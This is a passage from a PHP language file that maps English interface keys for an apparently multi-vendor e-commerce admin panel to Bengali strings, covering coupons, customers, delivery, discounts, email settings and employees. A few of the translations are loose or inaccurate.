'consumer_electronics' => 'ভোক্তা ইলেকট্রনিক্স', 'contact' => 'যোগাযোগ', 'contact info' => 'যোগাযোগের তথ্য', 'contact_Info' => 'যোগাযোগের তথ্য', 'contact_List' => 'যোগাযোগ তালিকা', 'contact_Person_Name' => 'যোগাযোগ ব্যক্তির নাম', 'contact_Us' => 'যোগাযোগ করুন', 'contact_With_Seller' => 'বিক্রেতার সাথে যোগাযোগ করুন', 'contact_bold' => ' যোগাযোগ ', 'contact_deleted_successfully' => 'সফলভাবে মুছে ফেলা যোগাযোগ', 'contact_info' => 'যোগাযোগের তথ্য', 'contact_number' => 'যোগাযোগের নম্বর', 'contact_person_name' => 'যোগাযোগ ব্যক্তির নাম', 'contact_us' => 'যোগাযোগ করুন', 'contact_with_seller' => 'বিক্রেতার সাথে যোগাযোগ করুন', 'contact_with_support_team' => 'সাপোর্ট দলের সাথে যোগাযোগ করুন', 'contact_your_email_service_provider_or_IT_administrator_to_obtain_the_SMTP_server_details_such_as_hostname_port_username_and_password' => 'এসএমটিপি সার্ভারের ডিটেলস যেমন হোস্টনাম পোর্ট ব্যবহারকারীর নাম এন্ড পাসওয়ার্ড পেতে আপনার ইমেল পরিষেবা সরবরাহকারী বা আইটি অ্যাডমিনের সাথে যোগাযোগ করুন', 'contacts' => 'পরিচিতি', 'continue' => 'চালিয়ে যান', 'continue_shopping' => 'কেনাকাটা চালিয়ে যান', 'convert_point_to_wallet_money' => 'ওয়ালেটের অর্থে পয়েন্ট রূপান্তর করুন', 'convert_to_currency' => 'মুদ্রায় রূপান্তর করুন', 'convert_your_loyalty_point_to_wallet_money.' => 'আপনার লয়াল্টি পয়েন্টকে ওয়ালেট অর্থের সাথে রূপান্তর করুন।', 'convert_your_loyalty_points_into_wallet_money' => 'আপনার লয়াল্টি পয়েন্টগুলি ওয়ালেটের অর্থে রূপান্তর করুন', 'converted_amount' => 'রূপান্তর পরিমাণ', 'converted_from_loyalty_point' => 'লয়াল্টি পয়েন্ট থেকে রূপান্তরিত', 'cookie_Settings' => 'কুকি সেটিংস', 'cookie_setting' => 'কুকি সেটিং', 'cookie_settings' => 'কুকি সেটিংস', 'cookie_text' => 'কুকি টেক্সট', 'cookies' => 'কুকিজ', 'copied' => 'অনুলিপি', 'copied_failed' => 'অনুলিপি ব্যর্থ হয়েছে', 'copied_to_the_clipboard' => 'ক্লিপবোর্ডে অনুলিপি', 'copy_Site_Key_and_Secret_Key _Paste_in_the_input_filed_below_and_Save.' => 'নীচে দায়ের করা ইনপুটটিতে সাইট কী এন্ড সিক্রেট কী পেস্টটি অনুলিপি করুন এন্ড সেভ করুন।', 'copy_URI' => 'অনুলিপি', 'copy_path' => 'অনুলিপি পথ', 'copy_right' => 'ডান অনুলিপি', 'copy_the_latitude_of_your_business_location_from_Google_Maps_and_paste_it_here' => 'গুগল ম্যাপ থেকে আপনার ব্যবসায়ের লোকেশন অক্ষাংশটি অনুলিপি করুন এন্ড এটি এখানে পেস্ট করুন', 'copy_the_longitude_of_your_business_location_from_Google_Maps_and_paste_it_here' => 'গুগল ম্যাপ থেকে আপনার ব্যবসায়ের লোকেশন দ্রাঘিমাংশ অনুলিপি করুন এন্ড এটি এখানে পেস্ট করুন', 'copy_your_code_and_share_your_friends' => 'আপনার কোডটি অনুলিপি করুন এন্ড আপনার বন্ধুদের শেয়ার করুন', 'copyright' => 'কপিরাইট', 'cost' => 'ব্যয়', 'cost_per_product' => 'পণ্য প্রতি ব্যয়', 'country' => 'দেশ', 'country_code' => 'কান্ট্রি কোড', 'country_code_is_must' => 'দেশের কোড আবশ্যক', 'country_code_is_must_like_for_BD' => 'দেশের কোড অবশ্যই বিডির জন্য পছন্দ করে', 'country_name' => 'দেশের নাম', 'coupon' => 'কুপন', 'coupon_Add' => 'কুপন অ্যাড', 'coupon_Discount' => 'কুপন ছাড়', 'coupon_Discount_Amount' => 'কুপন ছাড়ের পরিমাণ', 'coupon_Edit' => 'কুপন এডিট ', 'coupon_added_successfully' => 'কুপন সফলভাবে যোগ করেছে', 'coupon_applied_successfully' => 'কুপন সফলভাবে প্রয়োগ', 'coupon_bearer' => 'কুপন বহনকারী', 'coupon_bearer_is_required' => 'কুপন বহনকারী প্রয়োজন', 'coupon_bearer_is_required!' => 'কুপন বহনকারী প্রয়োজন!', 'coupon_code' => 'কুপন কোড', 'coupon_discount' => 'কুপন ছাড়', 'coupon_discount_amount' => 'কুপন ছাড়ের পরিমাণ', 'coupon_discount_will_be_shown_here' => 'কুপন ছাড় এখানে প্রদর্শিত হবে', 'coupon_form' => 'কুপন ফর্ম', 'coupon_is_invalid' => 'কুপন ইনভ্যালিড', 'coupon_list' => 'কুপন তালিকা', 'coupon_setup' => 'কুপন সেটআপ', 'coupon_title' => 'কুপন শিরোনাম', 'coupon_type' => 'কুপন টাইপ', 'coupon_update' => 'কুপন আপডেট', 'coupons' => 'কুপন', 'coupons_table' => 'কুপন টেবিল', 'create' => 'সৃষ্টি', 'create_App' => 'অ্যাপ্লিকেশন তৈরি করুন', 'create_a_support_tickets' => 'একটি সাপোর্ট টিকিট তৈরি করুন', 'create_a_unique_product_code_by_clicking_on_the_Generate_Code_button' => 'কোড বোতামে ক্লিক করে একটি অনন্য পণ্য কোড তৈরি করুন', 'create_credentials' => 'ক্রেডেনটিয়াল তৈরি করুন', 'create_support_tickets' => 'সাপোর্ট টিকিট তৈরি করুন', 'create_your_own_business' => 'আপনার নিজের ব্যবসা তৈরি করুন', 'create_your_own_store.' => 'আপনার নিজের স্টোর তৈরি করুন।', 'created_at' => 'এ নির্মিত', 'credential_setup' => 'ক্রেডেনটিয়াল সেটআপ', 'credential_updated' => 'ক্রেডেনটিয়াল আপডেট হয়েছে', 'credentials' => 'ক্রেডেনটিয়াল', 'credentials_SetUp_page' => 'ক্রেডেনটিয়াল সেটআপ পৃষ্ঠা', 'credentials_do_not_match_or_account_has_been_suspended' => 'ক্রেডেনটিয়ালগুলি মেলে না বা অ্যাকাউন্ট সাসপেন্ড করা হয়েছে', 'credit' => 'ক্রেডিট', 'currencies' => 'মুদ্রা', 'currency' => 'মুদ্রা', 'currency_Position' => 'মুদ্রা পজিশন', 'currency_changed_to' => 'মুদ্রা পরিবর্তিত হয়েছে', 'currency_code' => 'মুদ্রা কোড', 'currency_name' => 'মুদ্রার নাম', 'currency_symbol' => 'মুদ্রার প্রতীক', 'current_Stock' => 'বর্তমান ফান্ড', 'current_Stock_Amount' => 'বর্তমান স্টক পরিমাণ', 'current_customer' => 'বর্তমান খরিদ্দার', 'current_stock' => 'বর্তমান ফান্ড', 'current_stock_qty' => 'বর্তমান স্টক পরিমান', 'current_value_is' => 'বর্তমান মান হয়', 'currently_you_are_managing_banners_for_' => 'বর্তমানে আপনি ব্যানার পরিচালনা করছেন', 'custom' => 'কাস্টম', 'custom_Date' => 'কাস্টম তারিখ', 'custom_date' => 'কাস্টম তারিখ', 'custom_role' => 'কাস্টম ভূমিকা', 'customer' => 'ক্রেতা', 'customer Name' => 'ক্রেতার নাম', 'customer added successfully' => 'গ্রাহক সফলভাবে যুক্ত করেছেন', 'customer wallet' => 'গ্রাহক ওয়ালেট', 'customer wallet hist...' => 'গ্রাহক ওয়ালেট হিস্ট ...', 'customer wallets' => 'গ্রাহক ওয়ালেট', 'customer_Details' => 'কাস্টমার ডিটেলস', 'customer_ID' => 'গ্রাহক আইডি', 'customer_Info' => 'গ্রাহক তথ্য', 'customer_Information' => 'গ্রাহক তথ্য', 'customer_List' => 'গ্রাহক তালিকা', 'customer_Loyalty_Point' => 'গ্রাহক লয়াল্টি পয়েন্ট', 'customer_Loyalty_Point_Settings' => 'গ্রাহক লয়াল্টি পয়েন্ট সেটিংস', 'customer_Name' => 'ক্রেতার নাম', 'customer_Referrer_Earning' => 'গ্রাহক রেফারার উপার্জন', 'customer_Referrer_Settings' => 'গ্রাহক রেফারার সেটিংস', 'customer_Reviews' => 'ক্রেতার রিভিউ', 'customer_Wallet' => 'গ্রাহক ওয়ালেট', 'customer_Wallet_Settings' => 'গ্রাহক ওয়ালেট সেটিংস', 'customer_details' => 'কাস্টমার ডিটেলস', 'customer_id' => 'গ্রাহক আইডি', 'customer_info' => 'গ্রাহক তথ্য', 'customer_information' => 'গ্রাহক তথ্য', 'customer_list' => 'গ্রাহক তালিকা', 'customer_loyalty_point' => 'গ্রাহক লয়াল্টি পয়েন্ট', 'customer_loyalty_point_report' => 'গ্রাহক লয়াল্টি পয়েন্ট রিপোর্ট', 'customer_message' => 'গ্রাহক মেসেজ', 'customer_message_table' => 'গ্রাহক মেসেজ টেবিল', 'customer_name' => 'ক্রেতার নাম', 'customer_not_found' => 'গ্রাহক পাওয়া যায় নি', 'customer_one' => 'গ্রাহক এক', 'customer_referrer_earning' => 'গ্রাহক রেফারার উপার্জন', 'customer_removed' => 'গ্রাহক সরানো হয়েছে', 'customer_reviews' => 'ক্রেতার রিভিউ', 'customer_settings' => 'গ্রাহক সেটিংস', 'customer_settings_updated_successfully' => 'গ্রাহক সেটিংস সফলভাবে আপডেট হয়েছে', 'customer_two' => 'গ্রাহক দুই', 'customer_verify' => 'গ্রাহক যাচাই করুন', 'customer_wallet' => 'গ্রাহক ওয়ালেট', 'customer_wallet_bonus_edit' => 'গ্রাহক ওয়ালেট বোনাস এডিট ', 'customer_wallet_bonus_setup' => 'গ্রাহক ওয়ালেট বোনাস সেটআপ', 'customer_wallet_settings' => 'গ্রাহক ওয়ালেট সেটিংস', 'customer_will_get_extra_amount_to_his_or_her_wallet_additionally_with_the_amount_he_or_she_added_from_other_payment_gateways' => 'গ্রাহক তার বা তার ওয়ালেটে অতিরিক্ত পরিমাণ পাবেন অতিরিক্ত অর্থের সাথে তিনি বা তিনি অন্যান্য পেমেন্ট গেটওয়ে থেকে যুক্ত পরিমাণের সাথে যোগ করবেন', 'customers' => 'গ্রাহকরা', 'customers_receive_a_verification_code_after_placing_an_order' => 'গ্রাহকরা অর্ডার দেওয়ার পরে একটি ভেরিফিকেশন কোড পান', 'customers_settings' => 'গ্রাহক সেটিংস', 'customers_will_download_the_latest_customer_app_version_using_this_URL' => 'গ্রাহকরা এই ইউআরএল ব্যবহার করে সর্বশেষ গ্রাহক অ্যাপ সংস্করণটি ডাউনলোড করবেন', 'dark' => 'ডার্ক', 'dashboard' => 'ড্যাশবোর্ড', 'dashboard_order_statistics' => 'ড্যাশবোর্ড অর্ডার পরিসংখ্যান', 'data' => 'ডেটা', 'database' => 'তথ্যশালা', 'date' => 'তারিখ', 'date_Submitted' => 'জন্ম জমা', 'date_type' => 'তারিখের ধরণ', 'day' => 'দিন', 'day_limit' => 'দিনের সীমা', 'days' => 'দিন', 'days_after_delivery' => 'ডেলিভারির পরে দিন', 'days_free_delivery' => 'দিন বিনামূল্যে ডেলিভারি', 'deactive' => 'ডিএক্টিভ', 'deactive all seller product' => 'সমস্ত বিক্রেতা পণ্য নিষ্ক্রিয়', 'deactive all seller!!' => 'নিষ্ক্রিয় সমস্ত বিক্রেতা !!', 'deal of the days' => 'দিনগুলি ডিল', 'deal_Of_The_Day' => 'দিনের ডিল', 'deal_Product' => 'পণ্য পণ্য', 'deal_form' => 'ডিল ফর্ম', 'deal_of_the_day' => 'ডিল অফ দি ডে', 'dear' => 'Dear', 'debit' => 'ডেবিট', 'decimal_point_settings' => 'দশমিক পয়েন্ট সেটিংস', 'default' => 'ডিফল্ট', 'default currency can not be deleted!' => 'ডিফল্ট মুদ্রা মুছে ফেলা যায় না!', 'default currency can not be deleted!to delete change the default currency first!' => 'ডিফল্ট মুদ্রা মুছে ফেলা যায় না! প্রথমে ডিফল্ট মুদ্রা পরিবর্তন করতে মুছে ফেলতে!', 'default language can not be deleted! to delete change the default language first!' => 'ডিফল্ট ভাষা মুছে ফেলা যায় না! মুছতে প্রথমে ডিফল্ট ভাষা পরিবর্তন করতে!', 'default language can not be deleted!to delete change the default language first!' => 'ডিফল্ট ভাষা মুছে ফেলা যায় না! প্রথমে ডিফল্ট ভাষাটি পরিবর্তন করতে মুছে ফেলতে!', 'default_Method_updated_failed' => 'ডিফল্ট পদ্ধতি আপডেট হয়েছে ব্যর্থ', 'default_Method_updated_successfully' => 'ডিফল্ট পদ্ধতি সফলভাবে আপডেট হয়েছে', 'default_commission' => 'ডিফল্ট কমিশন', 'default_commission (%)' => 'ডিফল্ট কমিশন (%)', 'default_language_can_not_be_deactive' => 'ডিফল্ট ভাষা নিষ্ক্রিয় হতে পারে না', 'default_language_can_not_be_deleted' => 'ডিফল্ট ভাষা মুছে ফেলা যায় না', 'default_method' => 'ডিফল্ট পদ্ধতি', 'default_sort' => 'ডিফল্ট বাছাই', 'default_status' => 'ডিফল্ট স্ট্যাটাস', 'delete' => 'মুছে ফেলুন', 'delete it' => 'মুছে ফেলুন', 'delete_account' => 'একাউন্ট মুছে ফেলুন', 'delete_it' => 'মুছে ফেলুন', 'delete_profile' => 'প্রোফাইল মুছবেন', 'deleted!' => 'মুছে ফেলা হয়েছে!', 'delivered' => 'ডেলিভারি', 'delivered_By' => 'ডেলিভারি', 'delivered_by' => 'দ্বারা ডেলিভারি', 'delivery' => 'ডেলিভারি', 'delivery histories' => 'ডেলিভারি ইতিহাস', 'delivery man transac...' => 'ডেলিভারি ম্যান ট্রান্সাক ...', 'delivery men' => 'ডেলিভারি মেন', 'delivery zip codes' => 'ডেলিভারি জিপ কোড', 'delivery-Man' => 'ডেলিভারি-ম্যান', 'delivery-man' => 'ডেলিভারি-ম্যান', 'delivery_Charge' => 'ডেলিভারি চার্জ', 'delivery_Man' => 'ডেলিভারি-ম্যান', 'delivery_Man_Settings' => 'ডেলিভারি ম্যান সেটিংস', 'delivery_Restriction' => 'ডেলিভারি সীমাবদ্ধতা', 'delivery_address' => 'সরবরাহের ঠিকানা', 'delivery_available_country' => 'ডেলিভারি এভেইল্যাবলে দেশ', 'delivery_available_zip_code_area' => 'ডেলিভারি এভেইল্যাবলে জিপ কোড অঞ্চল', 'delivery_charge' => 'ডেলিভারি চার্জ', 'delivery_charge_earned' => 'ডেলিভারি চার্জ অর্জন', 'delivery_country_added_successfully' => 'ডেলিভারি দেশ সফলভাবে যুক্ত হয়েছে', 'delivery_country_deleted_successfully' => 'ডেলিভারি দেশ সফলভাবে মুছে ফেলা হয়েছে', 'delivery_country_restriction_status_changed_successfully' => 'ডেলিভারি দেশ সীমাবদ্ধতার স্ট্যাটাস সফলভাবে পরিবর্তিত হয়েছে', 'delivery_fee' => 'ডেলিভারি করার টাকা', 'delivery_fee_discount' => 'ডেলিভারি ফি ছাড়', 'delivery_info' => 'ডেলিভারি তথ্য', 'delivery_information_details' => 'ডেলিভারি তথ্য ডিটেলস', 'delivery_man' => 'ডেলিভারি-ম্যান', 'delivery_man_app_version_control' => 'ডেলিভারি ম্যান অ্যাপ সংস্করণ নিয়ন্ত্রণ', 'delivery_man_info' => 'ডেলিভারি ম্যান তথ্য', 'delivery_man_management' => 'ডেলিভারি ম্যান ম্যানেজমেন্ট', 'delivery_man_name' => 'ডেলিভারি ম্যান নাম', 'delivery_man_phone' => 'ডেলিভারি ম্যান ফোন', 'delivery_man_successfully_assigned/changed' => 'ডেলিভারি ম্যান সফলভাবে নির্ধারিত/পরিবর্তিত', 'delivery_man_successfully_assigned_or_changed' => 'ডেলিভারি ম্যান সফলভাবে নির্ধারিত বা পরিবর্তিত', 'delivery_restriction' => 'ডেলিভারি সীমাবদ্ধতা', 'delivery_service_name' => 'ডেলিভারি পরিষেবা নাম', 'delivery_to_country' => 'দেশে ডেলিভারি', 'delivery_to_zip_code_area' => 'জিপ কোড অঞ্চলে ডেলিভারি', 'delivery_type' => 'পেমেন্ট ধরণ, বিতরনের ধরণ', 'delivery_zip_code_deleted_successfully' => 'ডেলিভারি জিপ কোড সফলভাবে মুছে ফেলা হয়েছে', 'delivery_zip_code_restriction_status_changed_successfully' => 'ডেলিভারি জিপ কোড সীমাবদ্ধতার স্ট্যাটাস সফলভাবে পরিবর্তিত হয়েছে', 'deliveryman' => 'ডেলিভারি-ম্যান', 'deliveryman notifica...' => 'ডেলিভারিকারী নোটিফিকেশন ...', 'deliveryman wallets' => 'ডেলিভারিম্যান ওয়ালেট', 'deliveryman_List' => 'ডেলিভারিম্যান তালিকা', 'deliveryman_can_not_assign_or_change_in_that_status' => 'ডেলিভারিম্যান সেই স্ট্যাটাসে আসসাইন বা পরিবর্তন করতে পারবেন না', 'deliveryman_charge_add_successfully' => 'ডেলিভারি চার্জ সফলভাবে যুক্ত করুন', 'deliveryman_email' => 'ডেলিভারি ইমেল', 'deliveryman_image' => 'ডেলিভারি ইমেজ', 'deliveryman_info' => 'ডেলিভারিম্যান তথ্য', 'deliveryman_man_can_not_assign/change_in_that_status' => 'ডেলিভারি ম্যান সেই স্ট্যাটাসতে আসসাইন/পরিবর্তন করতে পারে না', 'deliveryman_man_can_not_assign_or_change_in_that_status' => 'ডেলিভারি ম্যান সেই স্ট্যাটাসতে আসসাইন বা পরিবর্তন করতে পারে না', 'deliveryman_name' => 'ডেলিভারিম্যান নাম', 'deliveryman_phone' => 'ডেলিভারি ফোন', 'deliveryman_review' => 'ডেলিভারিকারী রিভিউ', 'deliveryman_will_get' => 'ডেলিভারম্যান পাবে', 'deliverymen_will_download_the_latest_deliveryman_app_version_using_this_URL' => 'ডেলিভারিম্যানরা এই ইউআরএলটি ব্যবহার করে সর্বশেষ ডেলিভারি অ্যাপ্লিকেশন সংস্করণটি ডাউনলোড করবে', 'deneid' => 'ডিনাইড', 'deneied' => 'ডিনাইড', 'denied' => 'অস্বীকৃত', 'denied_Products' => 'ডিনাইড পণ্য', 'denied_note' => 'ডিনাইড নোট', 'deny' => 'ডিনাইড', 'describe_your_issue' => 'আপনার সমস্যাটি বর্ণনা', 'description' => 'বর্ণনা', 'details' => 'ডিটেলস', 'details_Description' => 'ডিটেলস বর্ণনা', 'dev' => 'দেব', 'dhaka' => ' ঢাকা', 'digit_after_decimal_point' => 'দশমিক পয়েন্টের পরে অঙ্ক', 'digital' => 'ডিজিটাল', 'digital product' => 'ডিজিটাল পণ্য', 'digital_Payments' => 'ডিজিটাল পেমেন্ট', 'digital_file_ready' => 'ডিজিটাল ফাইল প্রস্তুত', 'digital_payment' => 'ডিজিটাল পেমেন্ট', 'digital_payments' => 'ডিজিটাল পেমেন্ট', 'digital_product_type' => 'ডিজিটাল পণ্যের ধরণ', 'digitally paid' => 'ডিজিটালি পেইড', 'digitally_paid' => 'ডিজিটালি পেইড', 'digitaly_paid' => 'ডিজিটাল পেইড', 'direction' => 'ডিরেকশন', 'disabled' => 'ডিস্যাবল', 'disabling_SMTP_mail_configuration_services_stops_email_sending' => 'এসএমটিপি মেল কনফিগারেশন পরিষেবাগুলি ডিস্যাবল করা ইমেল প্রেরণ বন্ধ করে দেয়', 'disabling_sendgrid_mail_configuration_services_stops_email_sending' => 'সেন্ডগ্রিড মেল কনফিগারেশন পরিষেবাগুলি ডিস্যাবল করা ইমেল প্রেরণ বন্ধ করে দেয়', 'disburse' => 'ডেলিভারি', 'discount' => 'ছাড়', 'discount on purchase' => 'ক্রয় ছাড়', 'discount_Amount' => 'হ্রাসকৃত মুল্য', 'discount_Given' => 'ছাড় দেওয়া', 'discount_Type' => 'ছাড়ের ধরণ', 'discount_amount' => 'হ্রাসকৃত মুল্য', 'discount_amount_is_required' => 'ছাড়ের পরিমাণ প্রয়োজন', 'discount_amount_is_required!' => 'ছাড়ের পরিমাণ প্রয়োজন!', 'discount_bearer' => 'ছাড় বহনকারী', 'discount_given' => 'ছাড় দেওয়া', 'discount_on_Purchase' => 'ক্রয় ছাড়', 'discount_on_product' => 'পণ্য ছাড়', 'discount_on_purchase_and_first_delivery_coupon_amount_will_be_shown_here' => 'ক্রয় এন্ড প্রথম ডেলিভারি কুপনের পরিমাণ ছাড় এখানে প্রদর্শিত হবে', 'discount_type' => 'ছাড়ের ধরণ', 'discount_type_is_required' => 'ছাড়ের ধরণ প্রয়োজন', 'discount_type_is_required!' => 'ছাড়ের ধরণ প্রয়োজন!', 'discounted' => 'ছাড়', 'discounted_Amount' => 'ছাড়ের পরিমাণ', 'discounted_amount' => 'ছাড়ের পরিমাণ', 'discounted_products' => 'ছাড়যুক্ত পণ্য', 'display_name' => 'প্রদর্শন নাম', 'do_not_have_the_template' => 'টেমপ্লেট নেই', 'do_you_want_to_change_in_addon_status' => 'আপনি কি অ্যাডন স্ট্যাটাসে পরিবর্তন করতে চান?', 'do_you_want_to_delete_this' => 'আপনি কি এটি মুছতে চান?', 'do_you_want_to_logout' => 'আপনি কি লগআউট করতে চান?', 'do_you_want_to_shift_in_another_theme' => 'আপনি কি অন্য থিমে স্থানান্তর করতে চান?', 'domain' => 'ডোমেইন', 'dont_miss_todays_deal' => 'আজকের ডিল মিস করবেন না', 'don’t_miss_todays_deal' => 'আজকের ডিল মিস করবেন না', 'download' => 'ডাউনলোড', 'download_PDF' => 'পিডিএফ ডাউনলোড করুন', 'download_URL_For_Customer_App' => 'গ্রাহক অ্যাপের জন্য ইউআরএল ডাউনলোড করুন', 'download_URL_For_Deliveryman_App' => 'ডেলিভারম্যান অ্যাপের জন্য ইউআরএল ডাউনলোড করুন', 'download_URL_For_Seller_App' => 'বিক্রেতা অ্যাপের জন্য ইউআরএল ডাউনলোড করুন', 'download_here' => 'এখানে ডাউনলোড করুন', 'download_link' => 'ডাউনলোড লিংক', 'download_our_app' => 'আমাদের অ্যাপ্লিকেশন ডাউনলোড করুন', 'download_the_file_in_device_named' => 'নামযুক্ত ডিভাইসে ফাইলটি ডাউনলোড করুন', 'download_the_format_file_and_fill_it_with_proper_data.' => 'ফর্ম্যাট ফাইলটি ডাউনলোড করুন এন্ড এটি যথাযথ ডেটা দিয়ে পূরণ করুন।', 'drag_&_drop_file_or_browse_file' => 'টেনে আনুন এন্ড ফাইল ড্রপ করুন বা ফাইল ব্রাউজ করুন', 'driver' => 'ড্রাইভার', 'driving' => 'পরিচালনা', 'driving_License' => 'ড্রাইভিং লাইসেন্স', 'drop_here' => 'এখানে ড্রপ', 'due_Amount' => 'বাকি টাকা', 'duration' => 'সময়কাল', 'eBook' => 'ইবুক', 'earn_From_Order' => 'অর্ডার থেকে উপার্জন', 'earn_From_Shipping' => 'শিপিং থেকে উপার্জন', 'earn_money _o_your_wallet_by_completing_the_offer_&_challenged' => 'অফারটি সম্পূর্ণ করে আপনার ওয়ালেটে উপার্জন করুন', 'earned_by_referral' => 'রেফারেল দ্বারা অর্জিত', 'earning' => 'উপার্জন', 'earning_From_Shipping' => 'শিপিং থেকে উপার্জন', 'earning_Reports' => 'রিপোর্ট উপার্জন', 'earning_Statistics' => 'পরিসংখ্যান উপার্জন', 'earning_statistics' => 'পরিসংখ্যান উপার্জন', 'earning_statistics_for_business_analytics' => 'ব্যবসায় বিশ্লেষণের জন্য পরিসংখ্যান উপার্জন', 'earnings' => 'উপার্জন', 'earnings_to_Each_Referral' => 'প্রতিটি রেফারেল উপার্জন', 'ebooks' => 'ইবুকস', 'ecommerce' => 'ইকমার্স', 'edit' => 'এডিট ', 'edit_Customer' => 'গ্রাহক এডিট করুন', 'edit_Modal_Help_Topic' => 'মডেল সাহায্য বিষয় এডিট করুন', 'edit_Offline_Payment_Method' => 'অফলাইন পেমেন্ট পদ্ধতি এডিট করুন', 'edit_address' => 'ঠিকানা এডিট ', 'edit_most_demanded' => 'সর্বাধিক ডেম্যান্ডেড এডিট করুন', 'edit_products' => 'পণ্য এডিট করুন', 'edit_profile' => 'এডিট প্রোফাইল ', 'edit_shop' => 'শপ এডিট ', 'electronics' => 'ইলেকট্রনিক্স', 'email' => 'ইমেল', 'email_ID' => 'ইমেইল আইডি', 'email_Verification' => 'ইমেইলের সত্যতা যাচাই', 'email_address' => 'ইমেল ঠিকানা', 'email_already_has_been_taken' => 'ইতিমধ্যে ইমেল নেওয়া হয়েছে', 'email_configuration_error' => 'ইমেল কনফিগারেশন ত্রুটি', 'email_configured_perfectly' => 'ইমেল পুরোপুরি কনফিগার করা', 'email_failed' => 'ইমেল ব্যর্থ হয়েছে', 'email_id' => 'ইমেইল আইডি', 'email_not_found' => 'ইমেল পাওয়া যায় নি', 'email_status_is_not_active' => 'ইমেল স্ট্যাটাস সক্রিয় নয়', 'email_templates' => 'ইমেল টেমপ্লেট', 'email_verification' => 'ইমেইলের সত্যতা যাচাই', 'emergency contacts' => 'জরুরী যোগাযোগ', 'emergency_Contact' => 'জরুরী যোগাযোগ', 'emergency_contact' => 'জরুরী যোগাযোগ', 'employee_Edit' => 'কর্মচারী এডিট', 'employee_Login_Page' => 'কর্মচারী লগইন পৃষ্ঠা', 'employee_Role_Setup' => 'কর্মচারী ভূমিকা সেটআপ', 'employee_Update' => 'কর্মচারী আপডেট', 'employee_add' => 'কর্মচারী অ্যাড', 'employee_form' => 'কর্মচারী ফর্ম', 'employee_image' => 'কর্মচারী চিত্র', 'employee_list' => 'কর্মচারী তালিকা', 'employee_login_url' => 'কর্মচারী লগইন ইউআরএল', 'employee_role' => 'কর্মচারী ভূমিকা', 'employee_section' => 'কর্মচারী ক্যাটাগরি', 'employee_status_updated' => 'কর্মচারী স্ট্যাটাস আপডেট করা হয়েছে', 'employee_table' => 'কর্মচারী টেবিল', 'employee_updated_successfully' => 'সফলভাবে কর্মচারী আপডেট', 'employees' => 'কর্মচারী', 'empty' => 'খালি', 'empty_Cart' => 'খালি ট্রলি', 'empty_cart' => 'খালি ট্রলি', 'enable_POS_in_Seller_Panel' => 'বিক্রেতা প্যানেলে POS এনাবল করুন', 'enable_mail_configuration' => 'মেল কনফিগারেশন এনাবল করুন', 'enabling_mail_configuration_services_will_allow_the_system_to_send_emails.Please_ensure_that_you_have_correctly_configured_the_SMTP_settings_to_avoid_potential_issues_with_email_delivery' => 'মেল কনফিগারেশন পরিষেবাগুলি এনাবল করা সিস্টেমকে ইমেলগুলি প্রেরণ করার অনুমতি দেবে Ple দয়া করে আপনি ইমেল ডেলিভারি সহ সম্ভাব্য সমস্যাগুলি এড়াতে এসএমটিপি সেটিংসটি সঠিকভাবে কনফিগার করেছেন তা নিশ্চিত করুন', 'enabling_mail_configuration_services_will_allow_the_system_to_send_emails.Please_ensure_that_you_have_correctly_configured_the_sendgrid_settings_to_avoid_potential_issues_with_email_delivery' => 'মেল কনফিগারেশন পরিষেবাগুলি এনাবল করার ফলে সিস্টেমটিকে ইমেলগুলি প্রেরণ করার অনুমতি দেওয়া হবে ease আপনি ইমেল ডেলিভারি সহ সম্ভাব্য সমস্যাগুলি এড়াতে সেন্ডগ্রিড সেটিংসটি সঠিকভাবে কনফিগার করেছেন তা নিশ্চিত করুন', 'encryption' => 'এনক্রিপশন', 'end' => 'শেষ', 'end Date' => 'শেষ তারিখ', 'end_Date' => 'শেষ তারিখ', 'end_date' => 'শেষ তারিখ', 'enjoy_new_experience' => 'নতুন অভিজ্ঞতা উপভোগ করুন', 'enter_Attribute_Name' => 'এট্রিবিউট নাম লিখুন', 'enter_Social_Media_Link' => 'সোশ্যাল মিডিয়া লিঙ্ক প্রদান করুন', 'enter_captcha_value' => 'ক্যাপচা মান লিখুন', 'enter_choice_values' => 'পছন্দ মান লিখুন', 'enter_email' => 'ইমেইল প্রদান করুন', 'enter_email_address' => 'ইমেইল অ্যাড্রেস দিন', 'enter_email_address_or_phone_number' => 'ইমেল ঠিকানা বা ফোন নম্বর লিখুন', 'enter_email_or_phone_number' => 'ইমেল বা ফোন নম্বর লিখুন', 'enter_mailer_name' => 'মেলারের নাম লিখুন', 'enter_name' => 'নাম লিখুন', 'enter_new_email_address' => 'নতুন ইমেল ঠিকানা লিখুন', 'enter_new_password' => 'নতুন পাসওয়ার্ড লিখুন', 'enter_password' => 'পাসওয়ার্ড লিখুন', 'enter_phone_number' => 'ফোন নম্বর লিখুন', 'enter_tag' => 'ট্যাগ প্রদান করুন', 'enter_the_driver_for_your_mailing_service' => 'আপনার মেইলিং পরিষেবার জন্য ড্রাইভার প্রদান করুন', 'enter_the_encryption_type' => 'এনক্রিপশন প্রকার প্রদান করুন', 'enter_the_name_of_the_host_of_your_mailing_service' => 'আপনার মেইলিং পরিষেবার হোস্টের নাম লিখুন', 'enter_the_obtained_SMTP_server_details _including_the_hostname _port _username _and password' => 'হোস্টনাম পোর্ট ব্যবহারকারীর নাম এন্ড পাসওয়ার্ড সহ প্রাপ্ত এসএমটিপি সার্ভারের ডিটেলসটি প্রদান করুন', 'enter_the_port_number_for_your_mailing_service' => 'আপনার মেইলিং পরিষেবার জন্য পোর্ট নম্বরটি পেমেন্ট করুন', 'enter_the_username_of_your_account' => 'আপনার অ্যাকাউন্টের ব্যবহারকারীর নাম লিখুন', 'enter_url' => 'ইউআরএল দিন', 'enter_your_OTP' => 'Enter your OTP', 'enter_your_email' => 'আপনার ইমেইল প্রদান করুন', 'enter_your_email_ID' => 'আপনার ইমেল আইডি লিখুন', 'enter_your_email_address' => 'আপনার ই - মেইল ঠিকানা লিখুন', 'enter_your_order_ID_& _phone_to_get_delivery_updates' => 'ডেলিভারি আপডেট পেতে আপনার অর্ডার আইডি এন্ড ফোন প্রদান করুন', 'enter_your_password' => 'আপনার পাসওয়ার্ড লিখুন', 'enter_your_phone_number' => 'আপনার ফোন নম্বর লিখুন', 'enter_zip_code' => 'জিপ কোড প্রদান', 'enters_point_amount' => 'পয়েন্ট পরিমাণ প্রদান করুন', 'environment' => 'পরিবেশ', 'environment_Information' => 'পরিবেশ তথ্য', 'environment_setup' => 'পরিবেশ সেটআপ', 'equivalent_Point_to_1_Unit_Currency' => '1 ইউনিট মুদ্রার সমতুল্য পয়েন্ট', 'erfe' => 'এরফ', 'error' => 'ত্রুটি', 'estimated_Delivary_Date' => 'আনুমানিক ডেলিভারি 